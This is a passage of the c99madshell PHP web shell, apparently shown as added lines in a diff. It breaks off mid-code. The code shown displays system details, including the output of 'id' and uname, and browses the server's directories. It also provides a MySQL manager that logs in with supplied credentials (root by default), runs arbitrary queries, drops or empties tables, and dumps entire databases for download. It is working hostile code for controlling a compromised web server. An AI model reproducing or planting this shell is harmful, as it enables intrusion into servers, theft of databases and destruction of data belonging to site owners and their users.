+ | ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php | ||
+ | $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | ||
+ | if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} | ||
+ | $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | ||
+ | if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | ||
+ | $d = str_replace("\\\\","\\",$d); | ||
+ | $dispd = htmlspecialchars($d); | ||
+ | $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); | ||
+ | $i = 0; | ||
+ | foreach($pd as $b) | ||
+ | { | ||
+ | $t = ""; | ||
+ | $j = 0; | ||
+ | foreach ($e as $r) | ||
+ | { | ||
+ | $t.= $r.DIRECTORY_SEPARATOR; | ||
+ | if ($j == $i) {break;} | ||
+ | $j++; | ||
+ | } | ||
+ | echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; | ||
+ | $i++; | ||
+ | } | ||
+ | echo " "; | ||
+ | if (is_writable($d)) | ||
+ | { | ||
+ | $wd = TRUE; | ||
+ | $wdt = "<font color=green>[ ok ]</font>"; | ||
+ | echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $wd = FALSE; | ||
+ | $wdt = "<font color=red>[ Read-Only ]</font>"; | ||
+ | echo "<b>".view_perms_color($d)."</b>"; | ||
+ | } | ||
+ | if (is_callable("disk_free_space")) | ||
+ | { | ||
+ | $free = disk_free_space($d); | ||
+ | $total = disk_total_space($d); | ||
+ | if ($free === FALSE) {$free = 0;} | ||
+ | if ($total === FALSE) {$total = 0;} | ||
+ | if ($free < 0) {$free = 0;} | ||
+ | if ($total < 0) {$total = 0;} | ||
+ | $used = $total-$free; | ||
+ | $free_percent = round(100/($total/$free),2); | ||
+ | echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; | ||
+ | } | ||
+ | echo "<br>"; | ||
+ | $letters = ""; | ||
+ | if ($win) | ||
+ | { | ||
+ | $v = explode("\\",$d); | ||
+ | $v = $v[0]; | ||
+ | foreach (range("a","z") as $letter) | ||
+ | { | ||
+ | $bool = $isdiskette = in_array($letter,$safemode_diskettes); | ||
+ | if (!$bool) {$bool = is_dir($letter.":\\");} | ||
+ | if ($bool) | ||
+ | { | ||
+ | $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ "; | ||
+ | if ($letter.":" != $v) {$letters .= $letter;} | ||
+ | else {$letters .= "<font color=green>".$letter."</font>";} | ||
+ | $letters .= " ]</a> "; | ||
+ | } | ||
+ | } | ||
+ | if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} | ||
+ | } | ||
+ | if (count($quicklaunch) > 0) | ||
+ | { | ||
+ | foreach($quicklaunch as $item) | ||
+ | { | ||
+ | $item[1] = str_replace("%d",urlencode($d),$item[1]); | ||
+ | $item[1] = str_replace("%sort",$sort,$item[1]); | ||
+ | $v = realpath($d.".."); | ||
+ | if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} | ||
+ | $item[1] = str_replace("%upd",urlencode($v),$item[1]); | ||
+ | |||
+ | echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; | ||
+ | } | ||
+ | } | ||
+ | echo "</p></td></tr></table><br>"; | ||
+ | if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} | ||
+ | echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; | ||
+ | if ($act == "") {$act = $dspact = "ls";} | ||
+ | if ($act == "sql") | ||
+ | { | ||
+ | echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>"); | ||
+ | |||
+ | if (isset($_POST['sql_login'])) {$sql_login=htmlspecialchars($_POST['sql_login']);} | ||
+ | if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);} | ||
+ | if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);} | ||
+ | if (isset($_POST['sql_port'])) {$sql_port=htmlspecialchars($_POST['sql_port']);} | ||
+ | if (isset($_POST['sql_db'])) {$sql_db=htmlspecialchars($_POST['sql_db']);} | ||
+ | if (isset($_POST['sql_act'])) {$sql_act=htmlspecialchars($_POST['sql_act']);} | ||
+ | if (isset($_POST['sql_tbl'])) {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);} | ||
+ | if (isset($_POST['sql_tbl_act'])) {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);} | ||
+ | if (isset($_POST['thistbl'])) {$thistbl=htmlspecialchars($_POST['thistbl']);} | ||
+ | if (isset($_POST['sql_order'])) {$sql_order=htmlspecialchars($_POST['sql_order']);} | ||
+ | if (isset($_POST['sql_tbl_ls'])) {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);} | ||
+ | if (isset($_POST['sql_tbl_le'])) {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);} | ||
+ | if (isset($_POST['sql_query'])) {$sql_query=htmlspecialchars($_POST['sql_query']);} | ||
+ | if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));} | ||
+ | if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);} | ||
+ | if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);} | ||
+ | |||
+ | |||
+ | |||
+ | ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php | ||
+ | if ($sql_server) | ||
+ | { | ||
+ | $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); | ||
+ | $err = mysql_smarterror(); | ||
+ | @mysql_select_db($sql_db,$sql_sock); | ||
+ | if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} | ||
+ | } | ||
+ | else {$sql_sock = FALSE;} | ||
+ | echo "<b>SQL Manager:</b><br>"; | ||
+ | if (!$sql_sock) | ||
+ | { | ||
+ | if (!$sql_server) {echo "NO CONNECTION";} | ||
+ | else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $sqlquicklaunch = array(); | ||
+ | $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();"); | ||
+ | $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();"); | ||
+ | $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();"); | ||
+ | $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();"); | ||
+ | $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();"); | ||
+ | $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();"); | ||
+ | echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; | ||
+ | if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} | ||
+ | echo "</center>"; | ||
+ | } | ||
+ | echo "</td></tr><tr>"; | ||
+ | if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } | ||
+ | else | ||
+ | { | ||
+ | //Start left panel | ||
+ | if (!empty($sql_db)) | ||
+ | { | ||
+ | ?><td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login)) ?>';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd)) ?>';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server)) ?>';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port)) ?>';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php | ||
+ | $result = mysql_list_tables($sql_db); | ||
+ | if (!$result) {echo mysql_smarterror();} | ||
+ | else | ||
+ | { | ||
+ | echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; | ||
+ | $c = 0; | ||
+ | while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} | ||
+ | if (!$c) {echo "No tables found in database.";} | ||
+ | } | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | ?><td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><b>Home</b></a><hr size="1" noshade><?php | ||
+ | $result = mysql_list_dbs($sql_sock); | ||
+ | if (!$result) {echo mysql_smarterror();} | ||
+ | else | ||
+ | { | ||
+ | ?><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php | ||
+ | $c = 0; | ||
+ | $dbs = ""; | ||
+ | while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} | ||
+ | echo "<option value=\"\">Databases (".$c.")</option>"; | ||
+ | echo $dbs; | ||
+ | } | ||
+ | ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php | ||
+ | } | ||
+ | //End left panel | ||
+ | echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; | ||
+ | //Start center panel | ||
+ | $diplay = TRUE; | ||
+ | if ($sql_db) | ||
+ | { | ||
+ | if (!is_numeric($c)) {$c = 0;} | ||
+ | if ($c == 0) {$c = "no";} | ||
+ | echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; | ||
+ | if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} | ||
+ | echo "</b></center>"; | ||
+ | $acts = array("","dump"); | ||
+ | if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | ||
+ | elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} | ||
+ | elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} | ||
+ | elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | ||
+ | elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | ||
+ | elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | ||
+ | elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} | ||
+ | elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} | ||
+ | elseif ($sql_tbl_act == "insert") | ||
+ | { | ||
+ | if ($sql_tbl_insert_radio == 1) | ||
+ | { | ||
+ | $keys = ""; | ||
+ | $akeys = array_keys($sql_tbl_insert); | ||
+ | foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} | ||
+ | if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} | ||
+ | $values = ""; | ||
+ | $i = 0; | ||
+ | foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} | ||
+ | if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} | ||
+ | $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; | ||
+ | $sql_act = "query"; | ||
+ | $sql_tbl_act = "browse"; | ||
+ | } | ||
+ | elseif ($sql_tbl_insert_radio == 2) | ||
+ | { | ||
+ | $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); | ||
+ | $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; | ||
+ | $result = mysql_query($sql_query) or print(mysql_smarterror()); | ||
+ | $result = mysql_fetch_array($result, MYSQL_ASSOC); | ||
+ | $sql_act = "query"; | ||
+ | $sql_tbl_act = "browse"; | ||
+ | } | ||
+ | } | ||
+ | if ($sql_act == "query") | ||
+ | { | ||
+ | $sql_query = urldecode($sql_query); | ||
+ | echo "<hr size=\"1\" noshade>"; | ||
+ | if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} | ||
+ | if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} | ||
+ | if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";} | ||
+ | } | ||
+ | if (in_array($sql_act,$acts)) | ||
+ | { | ||
+ | ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php | ||
+ | if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} | ||
+ | if ($sql_act == "newtbl") | ||
+ | { | ||
+ | echo "<b>"; | ||
+ | if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; | ||
+ | } | ||
+ | else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | ||
+ | } | ||
+ | elseif ($sql_act == "dump") | ||
+ | { | ||
+ | if (empty($submit)) | ||
+ | { | ||
+ | $diplay = FALSE; | ||
+ | echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; | ||
+ | echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; | ||
+ | $v = join (";",$dmptbls); | ||
+ | echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; | ||
+ | if ($dump_file) {$tmp = $dump_file;} | ||
+ | else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} | ||
+ | echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; | ||
+ | echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; | ||
+ | echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; | ||
+ | echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; | ||
+ | echo "</form>"; | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $diplay = TRUE; | ||
+ | $set = array(); | ||
+ | $set["sock"] = $sql_sock; | ||
+ | $set["db"] = $sql_db; | ||
+ | $dump_out = "download"; | ||
+ | $set["print"] = 0; | ||
+ | $set["nl2br"] = 0; | ||
+ | $set[""] = 0; | ||
+ | $set["file"] = $dump_file; | ||
+ | $set["add_drop"] = TRUE; | ||
+ | $set["onlytabs"] = array(); | ||
+ | if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} | ||
+ | $ret = mysql_dump($set); | ||
+ | if ($sql_dump_download) | ||
+ | { | ||
+ | @ob_clean(); | ||
+ | header("Content-type: application/octet-stream"); | ||
+ | header("Content-length: ".strlen($ret)); | ||
+ | header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); | ||
+ | echo $ret; | ||
+ | exit; | ||
+ | } | ||
+ | elseif ($sql_dump_savetofile) | ||
+ | { | ||
+ | $fp = fopen($sql_dump_file,"w"); | ||
+ | if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} | ||
+ | else | ||
+ | { | ||
+ | fwrite($fp,$ret); | ||
+ | fclose($fp); | ||
